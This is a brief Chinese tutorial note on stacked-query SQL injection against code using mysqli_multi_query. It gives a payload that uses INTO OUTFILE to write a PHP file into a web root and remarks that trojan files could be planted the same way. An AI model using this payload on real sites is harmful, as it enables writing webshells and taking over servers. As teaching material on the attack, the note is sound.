条件

源代码使用musqli_multi_quiery();多语句查询函数,即可一次执行多条sql语句

语句

?id=1’;select “<?php phpinfo(); ?>” into outfile “D:\PHPKFGJ\phpstudy\PHPTutorial\WWW\213.php”-- -
sql注入之堆叠(多语句注入)

效果

该目录下写入了213.php文件,可由此写入一些木马文件
sql注入之堆叠(多语句注入)

相关文章: